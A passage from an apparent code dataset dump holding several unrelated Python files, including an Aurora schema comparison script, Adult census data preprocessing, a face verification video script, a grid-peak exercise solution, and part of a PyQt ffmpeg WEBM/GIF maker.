target_table_list=target_cursor.fetchall()\n\n target_not_exists,source_not_exists=compare_table(source_table_list,target_table_list,source_cursor)\n\n if(target_not_exists!=\"\"):\n '''\n #카운트비교\n print(\"########건수비교##########\")\n for source_table in source_table_list:\n not_exists_flag=0\n for target_not_exists_table in target_not_exists.replace(\"'\",\"\").split(\",\"):\n if source_table[0]==target_not_exists_table:\n not_exists_flag=1\n \n if not_exists_flag==0:\n source_cursor.execute(count_query%(server_info[\"source_schema\"],source_table[0]))\n source_count=source_cursor.fetchall()\n target_cursor.execute(count_query%(server_info[\"target_schema\"],source_table[0]))\n target_count=target_cursor.fetchall()\n if source_count != target_count:\n print(source_table[0] + \" 소스건수:\" + str(source_count[0][0]) + \" , 타겟건수:\" + str(target_count[0][0]))\n '''\n #컬럼비교\n source_cursor.execute(column_list_query%(server_info[\"source_schema\"],target_not_exists)) \n source_column_list=source_cursor.fetchall()\n target_cursor.execute(column_list_query%(server_info[\"target_schema\"],source_not_exists)) \n target_column_list=target_cursor.fetchall()\n compare_column(source_column_list,target_column_list)\n #인덱스비교\n source_cursor.execute(index_list_query%(server_info[\"source_schema\"],target_not_exists)) \n source_index_list=source_cursor.fetchall()\n target_cursor.execute(index_list_query%(server_info[\"target_schema\"],source_not_exists)) \n target_index_list=target_cursor.fetchall()\n compare_index(source_index_list,target_index_list)\n #루틴비교\n source_cursor.execute(routine_list_query%(server_info[\"source_schema\"])) \n source_routine_list=source_cursor.fetchall()\n target_cursor.execute(routine_list_query%(server_info[\"target_schema\"])) \n target_routine_list=target_cursor.fetchall()\n compare_routine(source_routine_list,target_routine_list)\n\n #컬럼권한비교\n 
source_cursor.execute(column_privilege_query%(server_info[\"source_schema\"])) \n source_colpriv_list=source_cursor.fetchall()\n target_cursor.execute(column_privilege_query%(server_info[\"target_schema\"])) \n target_colpriv_list=target_cursor.fetchall()\n compare_colpriv(source_colpriv_list,target_colpriv_list)\n\n #스키마권한비교\n source_cursor.execute(schema_privilege_query%(server_info[\"source_schema\"])) \n source_schpriv_list=source_cursor.fetchall()\n target_cursor.execute(schema_privilege_query%(server_info[\"target_schema\"])) \n target_schpriv_list=target_cursor.fetchall()\n compare_schpriv(source_schpriv_list,target_schpriv_list)\n\n #테이블권한비교\n source_cursor.execute(table_privilege_query%(server_info[\"source_schema\"])) \n source_tabpriv_list=source_cursor.fetchall()\n target_cursor.execute(table_privilege_query%(server_info[\"target_schema\"])) \n target_tabpriv_list=target_cursor.fetchall()\n compare_tabpriv(source_tabpriv_list,target_tabpriv_list)\n\n if(TUNNEL_FLAG==1):\n source_tunnel.stop()\n target_tunnel.stop()\n \n\n\n except Exception as ex:\n if(TUNNEL_FLAG==1):\n source_tunnel.stop()\n target_tunnel.stop()\n print(ex)\n sys.exit()\n\n\n","sub_path":"Aurora/compare_aurora/compare_aurora.py","file_name":"compare_aurora.py","file_ext":"py","file_size_in_byte":27662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"66091218","text":"import numpy as np\nimport sys\nimport random\nfrom datetime import datetime\n\n# print('Number of arguments:', len(sys.argv), 'arguments.')\n# print('Argument List:', str(sys.argv))\n\n# 生成数据\n#\nK = 14\nC = 2\n\nlabel = {'>': '+1', '<': '-1'}\nworkclass = {'?': 0, 'Private': 1, 'Self-emp-not-inc': 2, 'Self-emp-inc': 3, 'Federal-gov': 4, 'Local-gov': 5,\n\t\t\t 'State-gov': 6, 'Without-pay': 7, 'Never-worked': 8}\neducation = {'?': 0, 'Bachelors': 1, 'Some-college': 2, '11th': 3, 'HS-grad': 4, 'Prof-school': 5, 'Assoc-acdm': 6,\n\t\t\t 'Assoc-voc': 7, '9th': 8, '7th-8th': 9, '12th': 10,\n\t\t\t 'Masters': 11, '1st-4th': 12, '10th': 13, 'Doctorate': 14, '5th-6th': 15, 'Preschool': 16}\nmarital_status = {'?': 0, 'Married-civ-spouse': 1, 'Divorced': 2, 'Never-married': 3, 'Separated': 4, 'Widowed': 5,\n\t\t\t\t 'Married-spouse-absent': 6, 'Married-AF-spouse': 7}\noccupation = {'?': 0, 'Tech-support': 1, 'Craft-repair': 2, 'Other-service': 3, 'Sales': 4, 'Exec-managerial': 5,\n\t\t\t 'Prof-specialty': 6, 'Handlers-cleaners': 7,\n\t\t\t 'Machine-op-inspct': 8, 'Adm-clerical': 9, 'Farming-fishing': 10, 'Transport-moving': 11,\n\t\t\t 'Priv-house-serv': 12, 'Protective-serv': 13, 'Armed-Forces': 14}\nrelationship = {'?': 0, 'Wife': 1, 'Own-child': 2, 'Husband': 3, 'Not-in-family': 4, 'Other-relative': 5,\n\t\t\t\t'Unmarried': 6}\nrace = {'?': 0, 'White': 1, 'Asian-Pac-Islander': 2, 'Amer-Indian-Eskimo': 3, 'Other': 4, 'Black': 5}\nsex = {'?': 0, 'Female': 1, 'Male': 2}\nnative_country = {'?': 0, 'United-States': 1, 'Cambodia': 2, 'England': 3, 'Puerto-Rico': 4, 'Canada': 5, 'Germany': 6,\n\t\t\t\t 'Outlying-US(Guam-USVI-etc)': 7, 'India': 8,\n\t\t\t\t 'Japan': 9, 'Greece': 10, 'South': 11, 'China': 12, 'Cuba': 13, 'Iran': 14, 'Honduras': 15,\n\t\t\t\t 'Philippines': 16, 'Italy': 17, 'Poland': 18,\n\t\t\t\t 'Jamaica': 19, 'Vietnam': 20, 'Mexico': 21, 'Portugal': 22, 'Ireland': 23, 'France': 24,\n\t\t\t\t 'Dominican-Republic': 25, 'Laos': 26, 'Ecuador': 27,\n\t\t\t\t 'Taiwan': 28, 'Haiti': 29, 'Columbia': 30, 'Hungary': 31, 'Guatemala': 32, 'Nicaragua': 33,\n\t\t\t\t 'Scotland': 34, 'Thailand': 35, 
'Yugoslavia': 36,\n\t\t\t\t 'El-Salvador': 37, 'Trinadad&Tobago': 38, 'Peru': 39, 'Hong': 40, 'Holand-Netherlands': 41}\n\n\ndef create_datafiles(do_num, file_num, data_points):\n\twith open(\"DataFiles/DO\" + str(do_num) + \"_\" + str(file_num) + \".txt\", \"w\") as file_out:\n\t\t# Randomly shuffle so that DO gets different data for every generation\n\t\trandom.seed(datetime.now())\n\t\trand_idx = list(range(30000))\n\t\trandom.shuffle(rand_idx)\n\n\t\tdata = np.empty((data_points, K + 1))\n\n\t\tfor i in range(data_points):\n\t\t\twords = data_lines[rand_idx[i]].split(', ')\n\t\t\t# print(words)\n\n\t\t\t# Label\n\t\t\tdata[i][0] = label[words[14][0]]\n\n\t\t\t# Feature 1: age\n\t\t\tdata[i][1] = int(words[0])\n\n\t\t\t# Feature 2: workclass\n\t\t\tdata[i][2] = workclass[words[1]]\n\n\t\t\t# Feature 3: fnlwgt\n\t\t\tdata[i][3] = int(words[2])\n\n\t\t\t# Feature 4: education\n\t\t\tdata[i][4] = education[words[3]]\n\n\t\t\t# Feature 5: education-num\n\t\t\tdata[i][5] = int(words[4])\n\n\t\t\t# Feature 6: marital-status\n\t\t\tdata[i][6] = marital_status[words[5]]\n\n\t\t\t# Feature 7: occupation\n\t\t\tdata[i][7] = occupation[words[6]]\n\n\t\t\t# Feature 8: relationship\n\t\t\tdata[i][8] = relationship[words[7]]\n\n\t\t\t# Feature 9: race\n\t\t\tdata[i][9] = race[words[8]]\n\n\t\t\t# Feature 10: sex\n\t\t\tdata[i][10] = sex[words[9]]\n\n\t\t\t# Feature 11: capital-gain\n\t\t\tdata[i][11] = int(words[10])\n\n\t\t\t# Feature 12: capital-loss\n\t\t\tdata[i][12] = int(words[11])\n\n\t\t\t# Feature 13: hours-per-week\n\t\t\tdata[i][13] = int(words[12])\n\n\t\t\t# Feature 14: native-country\n\t\t\tdata[i][14] = native_country[words[13]]\n\n\t\tprint('N = ' + str(data_points) + ', K = ' + str(K) + ', C = ' + str(C))\n\t\t# print(data)\n\n\t\t# Normalize data to -1:+1\n\t\tmin_row = np.min(data, 0)\n\t\tmax_row = np.max(data, 0)\n\t\tdata = 2 * (data - min_row) / (max_row - min_row) - 1\n\n\t\t# print(data)\n\n\t\t# Convert to string\n\t\tdata_string = str(data_points) + ' ' + str(K) + ' ' + str(C) + ' '\n\n\t\tfor i in range(data_points):\n\t\t\tdata_string = data_string + '\\n'\n\t\t\tif data[i][0] == 1:\n\t\t\t\tdata_string = data_string + '+1 '\n\t\t\telse:\n\t\t\t\tdata_string = data_string + '-1 '\n\n\t\t\tfor j in range(K):\n\t\t\t\tdata_string = data_string + str(j + 1) + ':' + str(np.round(data[i, j + 1], 6)) + ' '\n\n\t\t# print(data_string)\n\n\t\t# Save file\n\t\tfile_out.write(data_string)\n\n\nif __name__ == '__main__':\n\t# 每个文件中的数据量\n\twith open(\"../CloudStorage/Reserved_ML_Data/adult.txt\", \"r\") as file_in:\n\t\t# file_out = open(\"data/102.txt\", \"w\")\n\t\tdata_lines = file_in.readlines()\n\n\t# 创建一个文件含有30000条数据\n\tcreate_datafiles(0, 1, 30000)\n\n\tfor i in range(2):\n\t\tcreate_datafiles(2, i+1, 15000)\n\n\tfor i in range(3):\n\t\tcreate_datafiles(3, i+1, 15000)\n\n\tfor i in range(5):\n\t\tcreate_datafiles(5, i+1, 6000)\n\n\tfor i in range(10):\n\t\tcreate_datafiles(10, i+1, 3000)\n\n\tfor i in range(15):\n\t\tcreate_datafiles(15, i+1, 2000)\n\n\tfor i in range(20):\n\t\tcreate_datafiles(20, i+1, 1500)\n\n\tfor i in range(30):\n\t\tcreate_datafiles(30, i+1, 1000)\n\n\tfor i in range(100):\n\t\tcreate_datafiles(1, i+1, 300)\n\n\n\n","sub_path":"process_adult_data.py","file_name":"process_adult_data.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"181219026","text":"\"\"\"\naioz.aiar.truongle - Jun 02, 2020\n\n\"\"\"\nimport cv2\nimport os\nimport glob\nimport 
argparse\nimport numpy as np\nfrom config import Config\nfrom inference.utils import utils\nfrom inference.api.face_detection_api import FaceDetectionApi\nfrom inference.api.face_ft_extractor_api import FaceFtExtractorApi\nfrom inference.models.wrapper.gender_detection_efficent_net import GenderDetectionPb\nfrom inference.models.wrapper.emotion_efficent_net import ExpressionDetectionPb\n\nparse = argparse.ArgumentParser()\nparse.add_argument(\"-i\", \"--input_dir\", type=str, default=\"data/db_video/USHER\")\nparse.add_argument(\"-o\", \"--output_dir\", type=str, default=\"data/test_video/hiv00004_res\")\nargs = parse.parse_args()\n\nINPUT_DIR = args.input_dir\nOUTPUT_DIR = args.output_dir\nOUT_VIDEO_PATH = \"data/test_video/hiv00004_res_.mp4\"\nSTEP = 10\n\nparams = {'FILTER_BOX_SIZE': 20,\n 'RESIZE_FRAME_RATIO': 1,\n 'HEAD_POSE_THRESH': 30,\n 'FACE_SIZE_OUTPUT': 112}\n\n\ndef vis(image, bbox, name, gen, emo, color=(0, 0, 255)):\n xmin, ymin, xmax, ymax = [int(x) for x in bbox]\n color = color\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_scale = 1.5\n thickness = 3\n # draw bbox\n cv2.rectangle(image, (xmin, ymin), (xmax, ymax), color, thickness)\n # Draw name\n label = name\n text_size = cv2.getTextSize(label, font, font_scale, thickness)\n cv2.rectangle(image,\n (xmin, ymin - 10 - text_size[0][1]),\n (xmin + 10 + text_size[0][0], ymin),\n color, -1)\n cv2.putText(image, label,\n (xmin + 5, ymin - 5),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1.5, (255, 255, 255), 3)\n\n text_size = cv2.getTextSize(gen, font, font_scale, thickness)\n txt_loc = (xmin, ymax + 10 + text_size[0][1])\n cv2.putText(image,\n text=gen,\n org=txt_loc,\n fontFace=font,\n fontScale=font_scale,\n color=color,\n thickness=thickness)\n\n # EXPR\n text_size = cv2.getTextSize(emo, font, font_scale, thickness)\n txt_loc = (xmin, ymax + 30 + 2*text_size[0][1])\n cv2.putText(image,\n text=emo,\n org=txt_loc,\n fontFace=font,\n fontScale=font_scale,\n color=color,\n thickness=thickness)\n\ndef main():\n os.makedirs(OUTPUT_DIR, exist_ok=True)\n config = Config()\n face_detection_api = FaceDetectionApi(config=config, params=params)\n print('\\nhere\\n')\n face_ft_extractor = FaceFtExtractorApi(config=config)\n print('\\nhere\\n')\n gender_estimator = GenderDetectionPb(config=config)\n emo_estimation = ExpressionDetectionPb(config=config)\n\n\n face_sample = \"data/test_video/USHER - DEA_000030.jpg\"\n # face_sample = \"data/test_video/sample.jpg\"\n \n video_pth = \"data/test_video/hiv00004.mp4\"\n cap = cv2.VideoCapture(video_pth)\n vid_w, vid_h = cap.get(cv2.CAP_PROP_FRAME_WIDTH), cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n fps = cap.get(cv2.CAP_PROP_FPS)\n total_frame = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n \n # INIT WRITER\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter(OUT_VIDEO_PATH, fourcc, fps, (int(vid_w), int(vid_h)))\n print(\"[INFO] information: \", vid_w, vid_h, fps)\n count = 0\n \n # GET SAMPLE:\n img_sample = cv2.imread(face_sample)\n img_sample = cv2.cvtColor(img_sample, cv2.COLOR_BGR2RGB)\n img_sample = np.transpose(img_sample, (2, 0, 1))\n face_ft_sample = face_ft_extractor.proceed(img_sample)\n emo_s = np.zeros(2)\n list_emo = [\"Hap\", \"Sad\"]\n\n # Feature list\n feature_list = []\n \n while cap.isOpened() and count <= 180*30:\n ret, frame = cap.read()\n if ret:\n # DETECTION\n boxes, faces, elapsed = face_detection_api.proceed(frame=frame, vid_w=vid_w, vid_h=vid_h)\n if boxes is not None:\n sim = []\n for box, face in zip(boxes, faces):\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n face = 
np.transpose(face, (2, 0, 1))\n face_ft = face_ft_extractor.proceed(face)\n _sim = np.dot(face_ft_sample, face_ft.T)\n sim.append(_sim)\n sim = np.asarray(sim)\n indices = np.argmax(sim)\n print(sim[indices])\n if sim[indices] > 0.3:\n face = faces[indices]\n face = cv2.cvtColor(face, cv2.COLOR_RGB2GRAY)\n face = cv2.cvtColor(face, cv2.COLOR_GRAY2BGR)\n emo = emo_estimation.process_prediction(face)[0]\n if emo in list_emo:\n idx = list_emo.index(emo)\n emo_s[idx] += 1\n emo_percent = emo_s / np.sum(emo_s)\n emo_percent = np.around(emo_percent, decimals=2)\n print(emo_s)\n if count > 10:\n emo_str = \"Pos: %s, Neg: %s\" % (emo_percent[0], emo_percent[1])\n else:\n emo_str = ''\n gen = gender_estimator.process_prediction(face, use_tta=True)\n gen_str = \"M\" if gen > 0.5 else \"F\"\n vis(image=frame, bbox=boxes[indices], name=\"DAE\", gen=gen_str, emo=emo_str)\n print(\"Frame: {}, Time: {}\".format(count, elapsed))\n out.write(frame)\n frame = cv2.resize(frame, (int(vid_w//3), int(vid_h//3)))\n cv2.imshow(\"abc\", frame)\n count += 1\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cap.release()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"run_face_verification.py","file_name":"run_face_verification.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159941270","text":"import sys\nN = int(sys.stdin.readline().rstrip())\na = [list(map(int,sys.stdin.readline().split())) for _ in range(N)]\ncnt = 0\n# point_n,point_s,point_w,point_e = 0\nfor i in range(N):\n for j in range(N):\n try:\n point_n = a[i-1][j]\n point_s = a[i+1][j]\n point_w = a[i][j-1]\n point_e = a[i][j+1]\n if i - 1 == -1:\n point_n = 0\n if j - 1 == -1:\n point_w = 0\n except:\n if i + 1 == N:\n point_n = a[i - 1][j]\n point_w = a[i][j - 1]\n point_s = 0\n if j + 1 == N:\n point_e = 0\n else:\n point_e = a[i][j + 1]\n if j + 1 == N:\n point_e = 0\n # 이거를 어떻게 처리해야할까..?\n # print(f'i = {i}, j = {j} , n = {point_n}, s = {point_s}, w = {point_w}, e = {point_e}')\n if a[i][j] > point_n and a[i][j] > point_s and a[i][j] > point_w and a[i][j] > point_e:\n cnt+=1\n # print(i,j)\nprint(cnt)","sub_path":"Inflearn/파이썬 알고리즘 문제풀이(코딩테스트 대비)/섹션 3/9. 봉우리/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"548147275","text":"import subprocess\nimport glob\nimport os, sys\nimport platform\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nos.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))\n\n#sudo pyinstaller -F --add-data 'ffmpeg:.' --add-data 'ffprobe:.' webmarizer.py\n\n# Lots of terrible global variables. 
Let's promise ourselves to fix this later, mkay?\nstopped = False\nthumbnailMode = False\nbitrate = 1500\nvideosList = []\nnumWEBM = 5\nlenLimit = 0\ntotalSeconds = 0\nfileSize = 0\noutputDuration = 8\nnumFiles = 0\noutputWidth = 500\nreturnedVideoList = False \nselectedVideo = \"\"\naudioEnabled = False\naudioDisable = '-an'\ntargetSizeSet = False\noutput_type = 'WEBM'\nsingle_mode = False\ntime_array = [0,0,0]\nthumbnailNumTilesSide = 2\nwadsworthConstant = 30\nwadsworthEnabled = True\nFFmpegProcess = QtCore.QProcess()\n\n# We'll need this to access ffmpeg & ffprobe once pyinstaller has created one-file executable\n# Returns some sort of temp directory\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n path = os.path.join(base_path, relative_path)\n return path\n\n# Here's where we can find ffmpeg & ffprobe. Check platform first, though.\ndef getDependencyPath(dependency):\n if (platform.system() == 'Windows'):\n if (dependency == 'ffmpeg'):\n path = resource_path('ffmpeg.exe')\n else:\n path = resource_path('ffprobe.exe')\n else:\n if (dependency == 'ffmpeg'):\n path = resource_path('ffmpeg')\n else:\n path = resource_path('ffprobe')\n return path\n\n\ndef createGif(fileName, startTime, ffmpeg_path):\n fileName_gif = os.path.splitext(fileName)[0] + '_' + str(numFiles) + '.gif'\n scaleString = 'scale=' + str(outputWidth) + ':-2'\n filters='fps=20,scale=' + str(outputWidth) + ':-1:flags=lanczos'\n \n # 1st Generate a pallete with ffmpeg\n args_palette = [\n '-ss', str(startTime),\n '-t', str(outputDuration),\n '-i' , fileName,\n '-vf', filters+\",palettegen\",\n '-y', 'palette.png'\n ]\n\n # 2nd Generate the gif using the palette\n args_gif = [\n '-ss', str(startTime),\n '-t', str(outputDuration),\n '-i' , fileName,\n '-i', 'palette.png'\n ]\n\n gif_opt_withSize = [\n '-fs', str(fileSize/1000) + \"M\",\n '-lavfi', filters+\"[x];[x][1:v]paletteuse\",\n '-y', fileName_gif\n ]\n\n gif_opts_noSize = [\n '-lavfi', filters+\"[x];[x][1:v]paletteuse\",\n '-y', fileName_gif\n ]\n\n if targetSizeSet:\n args_gif.extend(gif_opt_withSize)\n else:\n args_gif.extend(gif_opts_noSize)\n\n print(\"THE FILE SIZE IS: \" + str(fileSize/1000) + \"M\")\n print(\"Args palette: \" + str(args_palette))\n print(\"Args gif: \" + str(args_gif))\n\n GUI.setStatusText(\"Currently creating: \" + fileName_gif)\n FFmpegProcess.setProcessChannelMode(QtCore.QProcess.MergedChannels)\n app.processEvents()\n\n if (stopped == False):\n FFmpegProcess.execute(ffmpeg_path, args_palette)\n FFmpegProcess.waitForFinished(-1)\n FFmpegProcess.execute(ffmpeg_path, args_gif)\n FFmpegProcess.waitForFinished(-1)\n os.remove(\"palette.png\")\n\n# Use ffmpeg to create WEBM and read its stdout. 
To-Do:Use some regex later for progress bar\ndef createWebm(fileName, startTime, ffmpeg_path):\n fileName_webm = os.path.splitext(fileName)[0] + '_' + str(numFiles) + '.webm'\n scaleString = 'scale=' + str(outputWidth) + ':-2'\n \n \n \n \n args = ['-y',\n '-ss', str(startTime),\n '-t', str(outputDuration),\n '-i' , fileName,\n '-vf', scaleString,\n '-c:v', 'libvpx',\n '-b:v', str(bitrate)+\"K\",\n '-b:a', '96K',\n '-c:a', 'libvorbis']\n\n if not audioEnabled:\n args.append(audioDisable)\n \n args.append(fileName_webm)\n print(\"\\n\\n\\n\" + str(args) + \"\\n\\n\\n\")\n GUI.setStatusText(\"Currently creating: \" + fileName_webm)\n FFmpegProcess.setProcessChannelMode(QtCore.QProcess.MergedChannels)\n app.processEvents()\n if (stopped == False):\n FFmpegProcess.waitForFinished(-1)\n FFmpegProcess.execute(ffmpeg_path, args)\n FFmpegProcess.waitForFinished(-1)\n\n# Searches current directory for .mp4,.wmv,.avi, .mpeg, and .mkv videos\ndef createVideoList():\n for fileType in [\"*.mp4\", \"*.wmv\",\"*.avi\", \"*.mpeg\", \"*.mkv\"]:\n aVideo = glob.glob(fileType)\n if (len(aVideo) > 0):\n videosList.extend(aVideo) \n global returnedVideoList\n returnedVideoList = True\n return (videosList)\n\ndef join_videos(video, ffmpeg_path):\n GUI.setStatusText(\"Stiching WEBMs. This may take a while.\")\n FFmpegProcess.setProcessChannelMode(QtCore.QProcess.MergedChannels)\n app.processEvents()\n fileCount = 1\n previousColumnOutput = ''\n rowArray = []\n \n for row in range((thumbnailNumTilesSide)):\n firstInColumn = True\n for column in range(0,(thumbnailNumTilesSide-1)): \n if firstInColumn:\n fileName1 = os.path.splitext(video)[0] + '_' + str(fileCount) + '.webm'\n fileCount = fileCount + 1\n else:\n fileName1 = previousColumnOutput\n fileName2 = os.path.splitext(video)[0] + '_' + str(fileCount) + '.webm'\n output = os.path.splitext(video)[0] + '_' + str(fileCount) + '_' + str(row) + '.webm'\n previousColumnOutput = output\n \n \n args = ['-y',\n '-i' , fileName1,\n '-i' , fileName2,\n '-c:v', 'libvpx',\n '-b:v', str(bitrate)+\"K\",\n '-b:a', '96K',\n '-c:a', 'libvorbis']\n\n extendSettings1 = ['-filter_complex', '[0:v][1:v]hstack[v];[0:a][1:a]amerge=inputs=2[a]',\n '-map', '[v]',\n '-map', '[a]',\n '-ac', '2']\n\n extendSettings2 = ['-filter_complex', 'hstack']\n\n if not audioEnabled:\n args.append(audioDisable)\n for setting in extendSettings2:\n args.append(setting)\n else:\n for setting in extendSettings1:\n args.append(setting)\n \n\n \n print(fileName1)\n print(fileName2)\n print(output+\"\\n\")\n #print(\"Row: \" + str(row))\n #print(\"Column: \" + str(column))\n\n args.append(output)\n #print(args)\n FFmpegProcess.execute(ffmpeg_path, args)\n FFmpegProcess.waitForFinished(-1)\n fileCount = fileCount + 1\n firstInColumn = False\n if (column == (thumbnailNumTilesSide-1)-1):\n print(\"lol\")\n rowArray.append(output)\n print(rowArray)\n \n firstPair = True\n previousRow = ''\n for index in range(len(rowArray)-1):\n print(\"Current index is: \" + str(index))\n if firstPair:\n fileName1 = rowArray[index]\n else: \n fileName1 = previousRow\n firstPair = False\n\n if (index < len(rowArray)-1):\n print(rowArray)\n print(\"Length: \" + str(len(rowArray)))\n print(\"Index: \" + str(index))\n fileName2 = rowArray[index+1]\n else:\n print(\"This should never ever happen!\")\n\n\n output = os.path.splitext(video)[0] + '_row_' + str(index) + '.webm'\n if (index == (len(rowArray) - 2)):\n print(\"ayooo\")\n output = os.path.splitext(video)[0] + '_THUMBNAIL.webm'\n previousRow = output\n \n args2 = ['-y',\n 
'-i' , fileName1,\n '-i' , fileName2,\n '-c:v', 'libvpx',\n '-b:v', str(bitrate)+\"K\",\n '-b:a', '96K',\n '-c:a', 'libvorbis']\n \n extendSettings1 = ['-filter_complex', '[0:v][1:v]vstack[v];[0:a][1:a]amerge=inputs=2[a]',\n '-map', '[v]',\n '-map', '[a]',\n '-ac', '2']\n\n extendSettings2 = ['-filter_complex', 'vstack']\n \n if not audioEnabled:\n args2.append(audioDisable)\n for setting in extendSettings2:\n args2.append(setting)\n else:\n for setting in extendSettings1:\n args2.append(setting)\n args2.append(output)\n print(\"\\n\\n\\n\\n\\n\"+str(args2)+\"\\n\\n\\n\\n\\n\")\n print(fileName1)\n print(fileName2)\n print(output+'\\n')\n FFmpegProcess.execute(ffmpeg_path, args2)\n FFmpegProcess.waitForFinished(-1)\n\n# Takes video name, splits video into intervals, creates WEBM starting at each interval\ndef processVideo(aVideo):\n if aVideo == '':\n GUI.setStatusText(\"Please select a video from list when creating WEBM/GIF from single video.\")\n return\n global totalSeconds, stopped, numWEBM\n ffmpeg_path = getDependencyPath('ffmpeg')\n ffprobe_path = getDependencyPath('ffprobe')\n args = [\n ffprobe_path ,\n '-v' , 'quiet',\n '-show_entries' , 'format=duration',\n '-of' , 'csv=%s' % (\"p=0\"),\n '-i' , aVideo\n ]\n\n # We can use ffprobe to check the number of seconds in the video\n totalSeconds = subprocess.check_output(args)\n\n # Y u do dis? Have to look into why this is necessary.\n totalSeconds = float(totalSeconds.decode(\"utf-8\"))\n \n # Makes sure WEBM length \"L\" isn't created at startTime + L > Length of video\n getLenLimit()\n\n # Let's skip first 30% of video. Add opt for this later.\n startTime = ( (totalSeconds) * wadsworthConstant) / 100\n interval = ( int(totalSeconds) - startTime ) / numWEBM\n\n if thumbnailMode:\n interval = ( int(totalSeconds) - startTime ) / (thumbnailNumTilesSide**2)\n numWEBM = 1 #Fix this later - poor control of logic flow. 
Same with range loop.\n\n if single_mode:\n numWEBM = 1\n\n for i in range(numWEBM):\n app.processEvents() \n if (stopped == False): \n if startTime >= lenLimit:\n break\n global numFiles\n numFiles += 1\n \n if output_type == 'WEBM':\n if single_mode:\n custom_start_time = (time_array[0] * 3600) + (time_array[1] * 60) + time_array[2]\n createWebm(aVideo, custom_start_time,ffmpeg_path)\n elif thumbnailMode:\n print(thumbnailNumTilesSide**2)\n global bitrate, outputWidth\n for j in range((thumbnailNumTilesSide**2)):\n createWebm(aVideo, startTime, ffmpeg_path)\n startTime += interval\n numFiles += 1\n join_videos(aVideo,ffmpeg_path)\n else:\n createWebm(aVideo, startTime, ffmpeg_path)\n else:\n if single_mode:\n custom_start_time = (time_array[0] * 3600) + (time_array[1] * 60) + time_array[2]\n createGif(aVideo, custom_start_time,ffmpeg_path)\n else:\n createGif(aVideo, startTime,ffmpeg_path)\n\n startTime += interval\n else:\n app.processEvents() \n GUI.setStatusText(\"Process killed.\")\n\n# Makes sure WEBM length \"L\" isn't created at startTime + L > Length of video\ndef getLenLimit():\n global lenLimit\n lenLimit = totalSeconds - outputDuration - 1\n\n# Starts going through all the videos and initiates WEBM creation process\ndef init():\n global stopped\n stopped = False\n for video in videosList:\n if (stopped == False):\n global numFiles\n numFiles = 0\n processVideo(video)\n else:\n app.processEvents() \n GUI.setStatusText(\"Process killed.\")\n if (stopped == False):\n GUI.setStatusText(\"Finished!\")\n\n# Form implementation generated from reading ui file 'webmarizer_template.ui'\n# Created by: PyQt5 UI code generator 5.10.1\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n #===================================================================#\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(829, 330)\n MainWindow.setDocumentMode(False)\n MainWindow.setTabShape(QtWidgets.QTabWidget.Triangular)\n MainWindow.setUnifiedTitleAndToolBarOnMac(True)\n MainWindow.setStyleSheet(\"\"\"\n background-color: rgb(255, 255, 255);\n padding:0px;\n \"\"\")\n #===================================================================#\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n #===================================================================#\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n #===================================================================#\n spacerItem = QtWidgets.QSpacerItem(20, 25, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)\n spacerItem1 = QtWidgets.QSpacerItem(20, 25, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)\n spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n #===================================================================#\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n #===================================================================#\n self.generalTab = QtWidgets.QWidget()\n self.advancedTab = QtWidgets.QWidget()\n #===================================================================#\n self.layoutWidget = QtWidgets.QWidget(self.generalTab)\n self.layoutWidget1 = QtWidgets.QWidget(self.advancedTab)\n self.layoutWidget_2 = QtWidgets.QWidget(self.advancedTab)\n 
#===================================================================#\n self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget_2)\n self.verticalLayout_3 = QtWidgets.QVBoxLayout()\n self.verticalLayout_4 = QtWidgets.QVBoxLayout()\n self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.layoutWidget1)\n self.verticalLayout_6 = QtWidgets.QVBoxLayout()\n #===================================================================#\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout()\n #===================================================================#\n self.videoListTitleLabel = QtWidgets.QLabel(self.generalTab)\n self.statusLabel = QtWidgets.QLabel(self.centralwidget)\n self.durationLabel = QtWidgets.QLabel(self.layoutWidget)\n self.sizeLabel = QtWidgets.QLabel(self.layoutWidget)\n self.numWEBMLabel = QtWidgets.QLabel(self.layoutWidget)\n self.startTimeLabel = 